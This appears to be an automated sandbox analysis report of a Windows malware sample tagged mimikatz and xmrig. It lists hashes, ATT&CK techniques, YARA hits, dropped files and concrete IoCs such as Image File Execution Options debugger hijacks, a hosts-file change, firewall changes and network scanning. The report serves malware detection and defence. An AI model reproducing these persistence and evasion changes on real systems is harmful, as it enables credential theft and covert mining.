mimikatz | b315ff4cbaceb3ec59b06f3c0e257ee4126fb5762ea8815c314df447eabc5518

Analysis

max time kernel
150s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
02-11-2024 01:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-11-02_a1e1f5c40484de02cf1e54919b717f2d_hacktools_icedid_mimikatz.exe
Size

9.5MB
MD5

a1e1f5c40484de02cf1e54919b717f2d
SHA1

9b7a6f058c0b319961ff7e7aa3ce3cef423ffbf4
SHA256

b315ff4cbaceb3ec59b06f3c0e257ee4126fb5762ea8815c314df447eabc5518
SHA512

bda3f95208f220abafe4ac18835f66a9ca65d9e0f726a0ea619b32a9c79efbaa3764c6f2ecf368954422162a52e8c9bccba53d0a0fe830a6c85173f5b16afe5d
SSDEEP

196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1

Score

10^/10

mimikatz xmrig credential_access discovery evasion execution miner persistence privilege_escalation upx

Malware Config

Signatures

Disables service(s) 3 TTPs
evasion execution

Windows Service
T1543.003

Service Stop
T1489

Service Execution
T1569.002
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
mimikatz
Mimikatz family
mimikatz

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 216 created 2132	216	pnreyic.exe	38

Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Contacts a large (28877) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
credential_access

LSASS Memory
T1003.001

XMRig Miner payload 12 IoCs

miner

resource	yara_rule
behavioral2/memory/4800-177-0x00007FF70A3B0000-0x00007FF70A4D0000-memory.dmp	xmrig
behavioral2/memory/4800-181-0x00007FF70A3B0000-0x00007FF70A4D0000-memory.dmp	xmrig
behavioral2/memory/4800-198-0x00007FF70A3B0000-0x00007FF70A4D0000-memory.dmp	xmrig
behavioral2/memory/4800-215-0x00007FF70A3B0000-0x00007FF70A4D0000-memory.dmp	xmrig
behavioral2/memory/4800-224-0x00007FF70A3B0000-0x00007FF70A4D0000-memory.dmp	xmrig
behavioral2/memory/4800-233-0x00007FF70A3B0000-0x00007FF70A4D0000-memory.dmp	xmrig
behavioral2/memory/4800-248-0x00007FF70A3B0000-0x00007FF70A4D0000-memory.dmp	xmrig
behavioral2/memory/4800-256-0x00007FF70A3B0000-0x00007FF70A4D0000-memory.dmp	xmrig
behavioral2/memory/4800-267-0x00007FF70A3B0000-0x00007FF70A4D0000-memory.dmp	xmrig
behavioral2/memory/4800-377-0x00007FF70A3B0000-0x00007FF70A4D0000-memory.dmp	xmrig
behavioral2/memory/4800-378-0x00007FF70A3B0000-0x00007FF70A4D0000-memory.dmp	xmrig
behavioral2/memory/4800-381-0x00007FF70A3B0000-0x00007FF70A4D0000-memory.dmp	xmrig

mimikatz is an open source tool to dump credentials on Windows 4 IoCs

resource	yara_rule
behavioral2/memory/1476-0-0x0000000000400000-0x0000000000A9B000-memory.dmp	mimikatz
behavioral2/memory/1476-4-0x0000000000400000-0x0000000000A9B000-memory.dmp	mimikatz
behavioral2/files/0x000b000000023b58-6.dat	mimikatz
behavioral2/memory/3840-137-0x00007FF7913D0000-0x00007FF7914BE000-memory.dmp	mimikatz

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	pnreyic.exe
File created	C:\Windows\system32\drivers\npf.sys	wpcap.exe
File created	C:\Windows\system32\drivers\etc\hosts	pnreyic.exe

Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs

persistence

Image File Execution Options Injection

T1546.012

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	pnreyic.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	pnreyic.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	pnreyic.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	pnreyic.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	pnreyic.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	pnreyic.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	pnreyic.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe	pnreyic.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe	pnreyic.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	pnreyic.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe	pnreyic.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	pnreyic.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	pnreyic.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe	pnreyic.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe	pnreyic.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe	pnreyic.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe	pnreyic.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe	pnreyic.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe	pnreyic.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	pnreyic.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe	pnreyic.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	pnreyic.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe	pnreyic.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe	pnreyic.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	pnreyic.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	pnreyic.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe	pnreyic.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe	pnreyic.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	pnreyic.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	pnreyic.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	pnreyic.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe	pnreyic.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	pnreyic.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe	pnreyic.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	pnreyic.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe	pnreyic.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe	pnreyic.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe	pnreyic.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	pnreyic.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe	pnreyic.exe

Modifies Windows Firewall 2 TTPs 2 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
2372	netsh.exe
1344	netsh.exe

Executes dropped EXE 29 IoCs

pid	Process
404	pnreyic.exe
216	pnreyic.exe
4112	wpcap.exe
2588	ttsqkuccf.exe
3840	vfshost.exe
2432	cntrtrctt.exe
2736	xohudmc.exe
3912	iaacws.exe
4800	zergmt.exe
2476	cntrtrctt.exe
1344	cntrtrctt.exe
3156	cntrtrctt.exe
2320	cntrtrctt.exe
4840	cntrtrctt.exe
4956	cntrtrctt.exe
4160	cntrtrctt.exe
3964	cntrtrctt.exe
3924	cntrtrctt.exe
4776	cntrtrctt.exe
3544	pnreyic.exe
904	cntrtrctt.exe
3020	cntrtrctt.exe
5080	cntrtrctt.exe
4060	cntrtrctt.exe
2296	cntrtrctt.exe
2544	cntrtrctt.exe
4396	cntrtrctt.exe
2452	ncgcflyve.exe
5616	pnreyic.exe

Loads dropped DLL 12 IoCs

pid	Process
4112	wpcap.exe
4112	wpcap.exe
4112	wpcap.exe
4112	wpcap.exe
4112	wpcap.exe
4112	wpcap.exe
4112	wpcap.exe
4112	wpcap.exe
4112	wpcap.exe
2588	ttsqkuccf.exe
2588	ttsqkuccf.exe
2588	ttsqkuccf.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
80	ifconfig.me
81	ifconfig.me

Network Share Discovery 1 TTPs
Attempt to gather information on host network.
discovery

Network Share Discovery
T1135
Creates a Windows Service
persistence

Drops file in System32 directory 18 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\iaacws.exe	xohudmc.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751	pnreyic.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData	pnreyic.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BB4F4B8E2B2CFC476849B6B724C153FF	pnreyic.exe
File created	C:\Windows\SysWOW64\Packet.dll	wpcap.exe
File created	C:\Windows\system32\Packet.dll	wpcap.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	pnreyic.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft	pnreyic.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751	pnreyic.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BB4F4B8E2B2CFC476849B6B724C153FF	pnreyic.exe
File created	C:\Windows\SysWOW64\pthreadVC.dll	wpcap.exe
File created	C:\Windows\system32\wpcap.dll	wpcap.exe
File opened for modification	C:\Windows\SysWOW64\iaacws.exe	xohudmc.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache	pnreyic.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content	pnreyic.exe
File created	C:\Windows\SysWOW64\wpcap.dll	wpcap.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	pnreyic.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	pnreyic.exe

UPX packed file 37 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0008000000023c3a-135.dat	upx
behavioral2/memory/3840-136-0x00007FF7913D0000-0x00007FF7914BE000-memory.dmp	upx
behavioral2/memory/3840-137-0x00007FF7913D0000-0x00007FF7914BE000-memory.dmp	upx
behavioral2/files/0x0007000000023c4e-140.dat	upx
behavioral2/memory/2432-141-0x00007FF616D90000-0x00007FF616DEB000-memory.dmp	upx
behavioral2/memory/2432-156-0x00007FF616D90000-0x00007FF616DEB000-memory.dmp	upx
behavioral2/files/0x0007000000023c4b-163.dat	upx
behavioral2/memory/4800-164-0x00007FF70A3B0000-0x00007FF70A4D0000-memory.dmp	upx
behavioral2/memory/2476-170-0x00007FF616D90000-0x00007FF616DEB000-memory.dmp	upx
behavioral2/memory/1344-174-0x00007FF616D90000-0x00007FF616DEB000-memory.dmp	upx
behavioral2/memory/4800-177-0x00007FF70A3B0000-0x00007FF70A4D0000-memory.dmp	upx
behavioral2/memory/3156-179-0x00007FF616D90000-0x00007FF616DEB000-memory.dmp	upx
behavioral2/memory/4800-181-0x00007FF70A3B0000-0x00007FF70A4D0000-memory.dmp	upx
behavioral2/memory/2320-184-0x00007FF616D90000-0x00007FF616DEB000-memory.dmp	upx
behavioral2/memory/4840-188-0x00007FF616D90000-0x00007FF616DEB000-memory.dmp	upx
behavioral2/memory/4956-192-0x00007FF616D90000-0x00007FF616DEB000-memory.dmp	upx
behavioral2/memory/4160-196-0x00007FF616D90000-0x00007FF616DEB000-memory.dmp	upx
behavioral2/memory/4800-198-0x00007FF70A3B0000-0x00007FF70A4D0000-memory.dmp	upx
behavioral2/memory/3964-201-0x00007FF616D90000-0x00007FF616DEB000-memory.dmp	upx
behavioral2/memory/3924-205-0x00007FF616D90000-0x00007FF616DEB000-memory.dmp	upx
behavioral2/memory/4776-213-0x00007FF616D90000-0x00007FF616DEB000-memory.dmp	upx
behavioral2/memory/4800-215-0x00007FF70A3B0000-0x00007FF70A4D0000-memory.dmp	upx
behavioral2/memory/904-218-0x00007FF616D90000-0x00007FF616DEB000-memory.dmp	upx
behavioral2/memory/3020-222-0x00007FF616D90000-0x00007FF616DEB000-memory.dmp	upx
behavioral2/memory/4800-224-0x00007FF70A3B0000-0x00007FF70A4D0000-memory.dmp	upx
behavioral2/memory/5080-227-0x00007FF616D90000-0x00007FF616DEB000-memory.dmp	upx
behavioral2/memory/4060-230-0x00007FF616D90000-0x00007FF616DEB000-memory.dmp	upx
behavioral2/memory/2296-232-0x00007FF616D90000-0x00007FF616DEB000-memory.dmp	upx
behavioral2/memory/4800-233-0x00007FF70A3B0000-0x00007FF70A4D0000-memory.dmp	upx
behavioral2/memory/2544-235-0x00007FF616D90000-0x00007FF616DEB000-memory.dmp	upx
behavioral2/memory/4396-237-0x00007FF616D90000-0x00007FF616DEB000-memory.dmp	upx
behavioral2/memory/4800-248-0x00007FF70A3B0000-0x00007FF70A4D0000-memory.dmp	upx
behavioral2/memory/4800-256-0x00007FF70A3B0000-0x00007FF70A4D0000-memory.dmp	upx
behavioral2/memory/4800-267-0x00007FF70A3B0000-0x00007FF70A4D0000-memory.dmp	upx
behavioral2/memory/4800-377-0x00007FF70A3B0000-0x00007FF70A4D0000-memory.dmp	upx
behavioral2/memory/4800-378-0x00007FF70A3B0000-0x00007FF70A4D0000-memory.dmp	upx
behavioral2/memory/4800-381-0x00007FF70A3B0000-0x00007FF70A4D0000-memory.dmp	upx

Drops file in Program Files directory 3 IoCs

description	ioc	Process
File created	C:\Program Files\WinPcap\LICENSE	wpcap.exe
File created	C:\Program Files\WinPcap\uninstall.exe	wpcap.exe
File created	C:\Program Files\WinPcap\rpcapd.exe	wpcap.exe

Drops file in Windows directory 60 IoCs

description	ioc	Process
File created	C:\Windows\nblmptktz\UnattendGC\specials\docmicfg.exe	pnreyic.exe
File created	C:\Windows\nblmptktz\UnattendGC\vimpcsvc.xml	pnreyic.exe
File created	C:\Windows\hrmeszcf\vimpcsvc.xml	pnreyic.exe
File created	C:\Windows\nblmptktz\UnattendGC\AppCapture32.dll	pnreyic.exe
File created	C:\Windows\nblmptktz\UnattendGC\specials\posh-0.dll	pnreyic.exe
File created	C:\Windows\nblmptktz\UnattendGC\specials\spoolsrv.exe	pnreyic.exe
File created	C:\Windows\nblmptktz\UnattendGC\specials\libeay32.dll	pnreyic.exe
File created	C:\Windows\nblmptktz\etgfqftjv\ncgcflyve.exe	pnreyic.exe
File created	C:\Windows\nblmptktz\UnattendGC\specials\trfo-2.dll	pnreyic.exe
File created	C:\Windows\nblmptktz\UnattendGC\docmicfg.xml	pnreyic.exe
File opened for modification	C:\Windows\hrmeszcf\vimpcsvc.xml	pnreyic.exe
File created	C:\Windows\nblmptktz\Corporate\vfshost.exe	pnreyic.exe
File opened for modification	C:\Windows\nblmptktz\Corporate\log.txt	cmd.exe
File created	C:\Windows\nblmptktz\etgfqftjv\Packet.dll	pnreyic.exe
File created	C:\Windows\nblmptktz\UnattendGC\svschost.xml	pnreyic.exe
File created	C:\Windows\hrmeszcf\svschost.xml	pnreyic.exe
File created	C:\Windows\nblmptktz\UnattendGC\specials\libxml2.dll	pnreyic.exe
File created	C:\Windows\nblmptktz\upbdrjv\swrpwe.exe	pnreyic.exe
File created	C:\Windows\nblmptktz\UnattendGC\specials\ssleay32.dll	pnreyic.exe
File created	C:\Windows\nblmptktz\UnattendGC\specials\spoolsrv.xml	pnreyic.exe
File created	C:\Windows\hrmeszcf\docmicfg.xml	pnreyic.exe
File created	C:\Windows\nblmptktz\Corporate\mimilib.dll	pnreyic.exe
File opened for modification	C:\Windows\hrmeszcf\pnreyic.exe	2024-11-02_a1e1f5c40484de02cf1e54919b717f2d_hacktools_icedid_mimikatz.exe
File created	C:\Windows\nblmptktz\UnattendGC\specials\cnli-1.dll	pnreyic.exe
File created	C:\Windows\nblmptktz\UnattendGC\specials\coli-0.dll	pnreyic.exe
File created	C:\Windows\nblmptktz\UnattendGC\specials\crli-0.dll	pnreyic.exe
File created	C:\Windows\nblmptktz\UnattendGC\specials\tibe-2.dll	pnreyic.exe
File created	C:\Windows\nblmptktz\UnattendGC\specials\tucl-1.dll	pnreyic.exe
File created	C:\Windows\nblmptktz\UnattendGC\specials\svschost.exe	pnreyic.exe
File created	C:\Windows\nblmptktz\UnattendGC\specials\vimpcsvc.xml	pnreyic.exe
File created	C:\Windows\nblmptktz\etgfqftjv\wpcap.exe	pnreyic.exe
File opened for modification	C:\Windows\hrmeszcf\schoedcl.xml	pnreyic.exe
File created	C:\Windows\ime\pnreyic.exe	pnreyic.exe
File created	C:\Windows\nblmptktz\etgfqftjv\ip.txt	pnreyic.exe
File created	C:\Windows\nblmptktz\UnattendGC\specials\schoedcl.exe	pnreyic.exe
File created	C:\Windows\nblmptktz\UnattendGC\specials\trch-1.dll	pnreyic.exe
File created	C:\Windows\nblmptktz\UnattendGC\specials\zlib1.dll	pnreyic.exe
File created	C:\Windows\nblmptktz\UnattendGC\schoedcl.xml	pnreyic.exe
File created	C:\Windows\nblmptktz\Corporate\mimidrv.sys	pnreyic.exe
File created	C:\Windows\nblmptktz\etgfqftjv\scan.bat	pnreyic.exe
File opened for modification	C:\Windows\nblmptktz\etgfqftjv\Packet.dll	pnreyic.exe
File created	C:\Windows\nblmptktz\UnattendGC\specials\docmicfg.xml	pnreyic.exe
File created	C:\Windows\hrmeszcf\spoolsrv.xml	pnreyic.exe
File opened for modification	C:\Windows\nblmptktz\etgfqftjv\Result.txt	ncgcflyve.exe
File created	C:\Windows\nblmptktz\etgfqftjv\wpcap.dll	pnreyic.exe
File created	C:\Windows\nblmptktz\UnattendGC\specials\xdvl-0.dll	pnreyic.exe
File created	C:\Windows\hrmeszcf\schoedcl.xml	pnreyic.exe
File created	C:\Windows\nblmptktz\UnattendGC\specials\ucl.dll	pnreyic.exe
File created	C:\Windows\nblmptktz\UnattendGC\specials\schoedcl.xml	pnreyic.exe
File opened for modification	C:\Windows\hrmeszcf\spoolsrv.xml	pnreyic.exe
File created	C:\Windows\nblmptktz\UnattendGC\Shellcode.ini	pnreyic.exe
File created	C:\Windows\nblmptktz\UnattendGC\AppCapture64.dll	pnreyic.exe
File created	C:\Windows\nblmptktz\UnattendGC\spoolsrv.xml	pnreyic.exe
File created	C:\Windows\nblmptktz\etgfqftjv\ttsqkuccf.exe	pnreyic.exe
File created	C:\Windows\nblmptktz\UnattendGC\specials\svschost.xml	pnreyic.exe
File opened for modification	C:\Windows\hrmeszcf\svschost.xml	pnreyic.exe
File opened for modification	C:\Windows\hrmeszcf\docmicfg.xml	pnreyic.exe
File created	C:\Windows\nblmptktz\UnattendGC\specials\vimpcsvc.exe	pnreyic.exe
File created	C:\Windows\nblmptktz\UnattendGC\specials\exma-1.dll	pnreyic.exe
File created	C:\Windows\hrmeszcf\pnreyic.exe	2024-11-02_a1e1f5c40484de02cf1e54919b717f2d_hacktools_icedid_mimikatz.exe

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3156	sc.exe
3480	sc.exe
4092	sc.exe
736	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

